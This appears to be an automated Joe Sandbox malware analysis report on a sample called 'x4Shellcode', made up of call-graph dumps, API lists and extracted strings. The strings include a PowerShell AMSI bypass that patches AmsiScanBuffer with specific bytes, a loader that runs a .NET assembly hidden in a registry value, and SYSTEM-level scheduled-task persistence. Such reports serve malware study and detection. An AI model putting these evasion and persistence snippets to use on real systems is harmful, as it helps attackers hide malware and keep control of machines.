10792->10794 10797 7a361c __freea 20 API calls 10793->10797 10811 7a2317 10794->10811 10795->10792 10795->10793 10797->10787 10799 7a4639 10801 7a32fa 21 API calls 10799->10801 10804 7a465a 10799->10804 10800 7a4601 10800->10793 10802 7a2317 11 API calls 10800->10802 10801->10804 10802->10793 10803 7a46cf 10806 7a361c __freea 20 API calls 10803->10806 10804->10803 10805 7a2317 11 API calls 10804->10805 10807 7a46ae 10805->10807 10806->10793 10807->10803 10808 7a46bd WideCharToMultiByte 10807->10808 10808->10803 10809 7a46fd 10808->10809 10810 7a361c __freea 20 API calls 10809->10810 10810->10793 10812 7a20ef _abort 5 API calls 10811->10812 10813 7a233e 10812->10813 10816 7a2347 10813->10816 10819 7a239f 10813->10819 10817 7a4c0d _abort 5 API calls 10816->10817 10818 7a2399 10817->10818 10818->10793 10818->10799 10818->10800 10820 7a20ef _abort 5 API calls 10819->10820 10821 7a23c6 10820->10821 10822 7a4c0d _abort 5 API calls 10821->10822 10823 7a2387 LCMapStringW 10822->10823 10823->10816 10825 7a284d _abort 10824->10825 10832 7a2813 RtlEnterCriticalSection 10825->10832 10827 7a2857 10833 7a28ac 10827->10833 10831 7a2870 _abort 10831->10452 10832->10827 10845 7a2fcc 10833->10845 10835 7a28fa 10836 7a2fcc 26 API calls 10835->10836 10837 7a2916 10836->10837 10838 7a2fcc 26 API calls 10837->10838 10839 7a2934 10838->10839 10840 7a2864 10839->10840 10841 7a2096 _free 20 API calls 10839->10841 10842 7a2878 10840->10842 10841->10840 10859 7a282a RtlLeaveCriticalSection 10842->10859 10844 7a2882 10844->10831 10846 7a2fdd 10845->10846 10855 7a2fd9 10845->10855 10847 7a2fe4 10846->10847 10850 7a2ff7 _abort 10846->10850 10848 7a15d3 _free 20 API calls 10847->10848 10849 7a2fe9 10848->10849 10851 7a1517 _abort 26 API calls 10849->10851 10852 7a302e 10850->10852 10853 7a3025 10850->10853 10850->10855 10851->10855 10852->10855 10857 7a15d3 _free 20 API calls 10852->10857 10854 7a15d3 _free 20 API calls 10853->10854 10856 7a302a 10854->10856 10855->10835 10858 7a1517 _abort 26 API calls 10856->10858 10857->10856 10858->10855 10859->10844 11230 765b56 11231 765b1d 11230->11231 11232 765a9f 11230->11232 11231->11232 11233 765d20 2 API calls 11231->11233 11232->11232 11234 765b3c 11233->11234 11217 7662d2 11219 765d90 11217->11219 11220 765f10 11217->11220 11218 766084 SetFilePointerEx 11218->11220 11220->11218 11220->11219 11257 764f92 11258 765d20 2 API calls 11257->11258 11259 764f99 11258->11259 11235 766b50 11236 766b57 11235->11236 11238 765f10 11235->11238 11237 766084 SetFilePointerEx 11237->11238 11238->11237 11239 765d90 11238->11239 10156 78cbd0 10174 78be50 _wcslen 10156->10174 10157 78c168 10198 78a9a0 10157->10198 10159 765d20 2 API calls 10159->10174 10160 78c78e CloseServiceHandle 10160->10174 10161 78bffd StrStrIW 10161->10174 10162 78c706 StrStrIW 10162->10174 10164 78bf68 StrStrIW 10164->10174 10165 78c72b StrStrIW 10165->10174 10166 78c399 StrStrIW 10170 78c3a9 10166->10170 10166->10174 10167 78bf7e 10171 78c7e4 StartServiceW 10167->10171 10172 78c36b OpenServiceW 10167->10172 10169 78c0fd CloseServiceHandle 10169->10174 10171->10174 10172->10174 10173 78c65a ChangeServiceConfigW 10173->10174 10175 78bfe9 10173->10175 10174->10156 10174->10157 10174->10159 10174->10160 10174->10161 10174->10162 10174->10164 10174->10165 10174->10166 10174->10167 10174->10169 10174->10171 10174->10173 10174->10175 10176 76ce90 10174->10176 10194 78a350 10174->10194 10185 76cc9b _wcslen 10176->10185 10177 76d5c5 CreateFileW 10177->10185 10178 76d729 GetFileSizeEx 10181 76d8a1 CloseHandle 10178->10181 10178->10185 10179 765d20 VirtualAlloc VirtualFree 10179->10185 10180 76d426 10180->10181 10182 76d42a CloseHandle 10180->10182 10181->10185 10182->10185 10183 76cd5c lstrcmpiW 10183->10185 10185->10174 10185->10176 10185->10177 10185->10178 10185->10179 10185->10180 10185->10181 10185->10182 10185->10183 10186 76cca0 lstrcmpiW 10185->10186 10188 76d049 SetFilePointerEx 10185->10188 10189 76d903 10185->10189 10190 76d378 CloseHandle 10185->10190 10191 76cc92 10185->10191 10193 76cfbb GetFileTime 10185->10193 10202 7689a0 10185->10202 10207 768470 10185->10207 10186->10185 10188->10185 10189->10191 10192 79fdfc 40 API calls 10189->10192 10190->10185 10191->10174 10192->10189 10193->10185 10196 78a356 10194->10196 10195 78a707 CloseServiceHandle 10197 78a389 10195->10197 10196->10195 10196->10197 10197->10174 10200 78a905 10198->10200 10201 78a907 10198->10201 10199 78a92e LocalFree 10199->10200 10200->10175 10200->10198 10200->10199 10200->10201 10201->10175 10204 7689a4 10202->10204 10203 765d20 2 API calls 10203->10204 10204->10202 10204->10203 10205 7684c0 2 API calls 10204->10205 10206 768937 10204->10206 10205->10204 10206->10185 10208 765d20 2 API calls 10207->10208 10213 768481 10208->10213 10209 7684c0 2 API calls 10209->10213 10210 7684b4 10210->10185 10211 765d20 VirtualAlloc VirtualFree 10211->10213 10212 771d60 2 API calls 10212->10213 10213->10209 10213->10210 10213->10211 10213->10212 11240 7a8b50 11243 7a8b6e 11240->11243 11242 7a8b66 11247 7a8b73 11243->11247 11244 7a1a1b 21 API calls 11246 7a8d9f 11244->11246 11245 7a8c08 11245->11242 11246->11242 11247->11244 11247->11245 9874 766086 SetFilePointerEx 9876 765f10 9874->9876 9875 766084 SetFilePointerEx 9875->9876 9876->9875 9877 765d90 9876->9877 11253 765fc7 11255 765f10 11253->11255 11254 766084 SetFilePointerEx 11254->11255 11255->11254 11256 765d90 11255->11256 9878 765085 9879 76506f 9878->9879 9880 765089 9878->9880 9883 788550 9879->9883 9882 765078 9885 788556 9883->9885 9884 788145 GetLastError 9907 787dd7 9884->9907 9885->9883 9885->9884 9887 788bc1 GetLastError 9885->9887 9888 788986 SetEntriesInAclW 9885->9888 9890 7889cd OpenMutexW 9885->9890 9897 788599 9885->9897 9898 787d20 9885->9898 9901 78896a wsprintfW 9885->9901 9902 788953 AllocateAndInitializeSid 9885->9902 9903 787d30 9885->9903 9905 78890b LocalFree 9885->9905 9885->9907 9908 787d37 9885->9908 9886 788209 GetUserNameW 9886->9907 9886->9908 9887->9885 9888->9885 9889 7883fb GetUserNameW 9889->9907 9890->9882 9891 788248 9893 78824a GetLastError 9891->9893 9895 788250 9893->9895 9894 787d6c GetVolumeInformationW 9894->9882 9895->9882 9896 78836e GetLastError 9896->9907 9897->9901 9897->9903 9898->9894 9899 787d83 GetWindowsDirectoryW 9898->9899 9898->9903 9904 787e06 GetComputerNameW 9898->9904 9898->9908 9899->9903 9899->9908 9900 787fd4 GetLastError 9900->9907 9901->9903 9902->9885 9903->9894 9903->9908 9904->9908 9905->9885 9906 787f6b GetVolumeInformationW 9906->9907 9907->9884 9907->9886 9907->9889 9907->9891 9907->9893 9907->9894 9907->9896 9907->9898 9907->9900 9907->9903 9907->9906 9907->9908 9908->9882 10877 7a708e RtlUnwind 11143 771d00 11149 770fb0 11143->11149 11150 7710d9 11143->11150 11145 771300 11147 765d20 2 API calls 11145->11147 11146 765d20 2 API calls 11146->11149 11148 771307 11147->11148 11149->11143 11149->11145 11149->11146 11149->11150 11152 770fb0 11149->11152 11161 7a5b2d 11149->11161 11158 770fe9 11152->11158 11153 765d20 2 API calls 11153->11158 11154 770fb0 7 API calls 11154->11158 11155 7a5b2d 5 API calls 11155->11158 11156 771300 11157 765d20 2 API calls 11156->11157 11160 771307 11157->11160 11158->11149 11158->11152 11158->11153 11158->11154 11158->11155 11158->11156 11159 7710d9 11158->11159 11159->11149 11160->11149 11164 7a6229 11161->11164 11163 7a5b3f 11163->11149 11165 7a6254 11164->11165 11166 7a4c0d _abort 5 API calls 11165->11166 11167 7a6345 11166->11167 11167->11163 10865 7a00c0 10868 7a00d9 10865->10868 10867 7a00d7 10869 7a014c 10868->10869 10870 7a032f 10869->10870 10871 7a1a1b 21 API calls 10869->10871 10870->10867 10872 7a08d6 10871->10872 10872->10867 11213 765648 11216 768250 GetCurrentProcess 11213->11216 11215 76564f 11216->11215

                                                  Control-flow Graph

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                  • StrCpyW.SHLWAPI(00000000,00402224), ref: 00401888
                                                  • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                    • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                    • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                  • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                  • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`x4stager`)).EntryPoint.Invok), ref: 004018CB
                                                  • StrCatW.SHLWAPI(00000000,00402224), ref: 004018CF
                                                  Strings
                                                  • AmsiPtr, xrefs: 0040195C
                                                  • Get-Delegate, xrefs: 004018D8
                                                  • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                                                  • NativeMethods, xrefs: 00401908
                                                  • VirtualProtectPtr, xrefs: 00401950
                                                  • OldProtect, xrefs: 00401974
                                                  • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                                                  • ParameterTypes, xrefs: 004018E4
                                                  • TypeBuilder, xrefs: 004018FC
                                                  • $"@, xrefs: 0040187F
                                                  • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`x4stager`)).EntryPoint.Invok, xrefs: 004018C5
                                                  • LoadLibraryDelegate, xrefs: 00401920
                                                  • Kernel32Ptr, xrefs: 00401938
                                                  • VirtualProtectDelegate, xrefs: 0040192C
                                                  • AmsiScanBufferPtr, xrefs: 00401968
                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                                                  • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                                                  • LoadLibraryPtr, xrefs: 00401944
                                                  • GetProcAddress, xrefs: 00401914
                                                  • ReturnType, xrefs: 004018F0
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: Process$Heap$AllocCurrentWow64
                                                  • String ID: $"@$AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`x4stager`)).EntryPoint.Invok$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                                                  • API String ID: 2666690646-3088475357
                                                  • Opcode ID: 7dd66e99383ae1552adbce447a862179cc49cfdd6dc473897744240f6882a1b6
                                                  • Instruction ID: 9b5450491cc664af4d4994e9e94c04feaecdaa062e141dc5018fbc9805008e1f
                                                  • Opcode Fuzzy Hash: 7dd66e99383ae1552adbce447a862179cc49cfdd6dc473897744240f6882a1b6
                                                  • Instruction Fuzzy Hash: F5219C9030256463D9163A621A6692F990E8BC0B46710C43FF9457F7E9DF7E8F038ADE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d$w
                                                  • API String ID: 0-2400632791
                                                  • Opcode ID: 0d63155bfd2a819b22769b6cc5dd697520b974ea7823b97c39aeffb33ffb3330
                                                  • Instruction ID: 621f0861d4e4261e0260c6eedd42a90ef0793cf626747d41d231bc69da7300f6
                                                  • Opcode Fuzzy Hash: 0d63155bfd2a819b22769b6cc5dd697520b974ea7823b97c39aeffb33ffb3330
                                                  • Instruction Fuzzy Hash: 04C124A1AC8384AEDE337A248C4DB763B64AB61760F5C4196F649D60F3E37C5C049732

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 380 40151a-401547 SysAllocString * 2 CoInitializeEx 381 40154d-401561 CoInitializeSecurity 380->381 382 40165f-401673 SysFreeString * 2 380->382 383 401563-401568 381->383 384 40156e-40158a CoCreateInstance 381->384 383->384 385 401659 SysFreeString 383->385 384->385 386 401590-4015d5 VariantInit 384->386 385->382 388 4015d7-4015ec 386->388 389 40164d-401656 386->389 388->389 392 4015ee-401603 388->392 389->385 394 401644-401648 392->394 395 401605-40162d VariantInit 392->395 394->389 397 40163b-40163f 395->397 398 40162f-401636 395->398 397->394 398->397
                                                  APIs
                                                  • SysAllocString.OLEAUT32(x4svc64), ref: 0040152C
                                                  • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                  • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                  • VariantInit.OLEAUT32(?), ref: 00401594
                                                  • VariantInit.OLEAUT32(?), ref: 00401609
                                                  • SysFreeString.OLEAUT32 ref: 00401659
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00401666
                                                  • SysFreeString.OLEAUT32(?), ref: 0040166B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: String$Free$AllocInitInitializeVariant$CreateInstanceSecurity
                                                  • String ID: x4svc32$x4svc64
                                                  • API String ID: 1266136160-89065942
                                                  • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                  • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                                                  • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                                                  • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718635124.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_760000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID:
                                                  • API String ID: 1452528299-0
                                                  • Opcode ID: 8f23611293171af965204233360cd2461fdc816d478a7012b577320d11231a79
                                                  • Instruction ID: e2ddd2c0a7f2a80c93fce8235177780d26751921140c88731f72032bc52ecb94
                                                  • Opcode Fuzzy Hash: 8f23611293171af965204233360cd2461fdc816d478a7012b577320d11231a79
                                                  • Instruction Fuzzy Hash: 70E12A61ACC341AACBFA77284C0D7352B616B62730FEC4689E156D61E2EE6C9C05D337

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 756 4017a5-4017bf FindResourceA 757 401862-401867 756->757 758 4017c5-4017d2 SizeofResource 756->758 759 401861 758->759 760 4017d8-4017e2 LoadResource 758->760 759->757 760->759 761 4017e4-401809 LockResource RegOpenKeyExW 760->761 761->759 762 40180b-401820 RegSetValueExW 761->762 762->759 763 401822-401858 call 401868 call 4b7000 call 401674 call 40112f call 4011ad 762->763 763->759 774 40185a-40185c call 40151a 763->774 774->759
                                                  APIs
                                                  • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                                  • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                                  • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                                  • RegSetValueExW.KERNELBASE(?,x4stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                                    • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                                    • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                                    • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402224), ref: 00401888
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`x4stager`)).EntryPoint.Invok), ref: 004018CB
                                                    • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402224), ref: 004018CF
                                                    • Part of subcall function 00401674: SysAllocString.OLEAUT32(x4svc64), ref: 00401686
                                                    • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                                    • Part of subcall function 00401674: CoInitializeEx.OLE32(00000000,00000000), ref: 00401699
                                                    • Part of subcall function 00401674: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                                    • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                                    • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
                                                    • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                                    • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(x4svc64), ref: 004011C2
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402220), ref: 004011CC
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                                    • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                                    • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                                    • Part of subcall function 004011AD: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                                    • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                                    • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                                                    • Part of subcall function 0040151A: SysAllocString.OLEAUT32(x4svc64), ref: 0040152C
                                                    • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                                    • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                                    • Part of subcall function 0040151A: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                                    • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                                    • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: Alloc$String$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$Heap$CurrentFindLoadLockOpenSizeofValueWow64
                                                  • String ID: EXE$SOFTWARE$x4stager$x4svc32$x4svc64
                                                  • API String ID: 820547072-3606063238
                                                  • Opcode ID: 752774cb16c3456600544702203ef72b6a59699e81ef877694f49283558a7759
                                                  • Instruction ID: 97b127815c02212611a925856204006170aaa4c324c96dff58cf3c981eef98e4
                                                  • Opcode Fuzzy Hash: 752774cb16c3456600544702203ef72b6a59699e81ef877694f49283558a7759
                                                  • Instruction Fuzzy Hash: BF1194727003156AE71127725D8DE6B255DABC5794B14443BBA05F62E2DEB8CD008168

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1222 401000-401026 CryptAcquireContextW 1223 401044-40104a 1222->1223 1224 401028-401041 CryptGenRandom CryptReleaseContext 1222->1224 1224->1223
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                                  • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                  • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                  Strings
                                                  • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID: Microsoft Base Cryptographic Provider v1.0
                                                  • API String ID: 1815803762-291530887
                                                  • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                  • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                                                  • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                                                  • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

                                                  Control-flow Graph

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00402224), ref: 004019F4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A01
                                                  • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
                                                    • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                                    • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                                    • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                                                  • StrStrIW.KERNELBASE(?,004037DC), ref: 00401A46
                                                  • StrStrIW.SHLWAPI(00000002,004037DC), ref: 00401A6D
                                                  • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
                                                  • StrCatW.SHLWAPI(00000000,004037E0), ref: 00401A90
                                                  • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
                                                  • StrCatW.SHLWAPI(?,?), ref: 00401AF2
                                                  • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
                                                  • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
                                                  • StrCatW.SHLWAPI(00000000,004037E0), ref: 00401B47
                                                  • StrStrIW.SHLWAPI(?,004037DC), ref: 00401B61
                                                  • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
                                                  • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
                                                  • HeapFree.KERNEL32(00000000), ref: 00401B93
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
                                                  • RtlFreeHeap.NTDLL(00000000), ref: 00401B9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1718375066.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.1718357951.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718397531.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000001.00000002.1718425145.000000000042A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_x4Shellcode.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                                                  • String ID: '+'$'+[Char]($)+'
                                                  • API String ID: 3510167801-3465596256
                                                  • Opcode ID: f1351023a9aaddaf01f8a1d036fdc1626dd07f80e7dc6a31c786435b4a59d34e
                                                  • Instruction ID: 6a05bfd6a90ce5f0659dca2a5b3c69ea2108d0527b441d1965fc691ad7bde589
                                                  • Opcode Fuzzy Hash: f1351023a9aaddaf01f8a1d036fdc1626dd07f80e7dc6a31c786435b4a59d34e
                                                  • Instruction Fuzzy Hash: 6751F3B1E00219ABCB15DFB4DD49AAEBBBDFB48301F14446AE605F7290DB79DA00CB54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
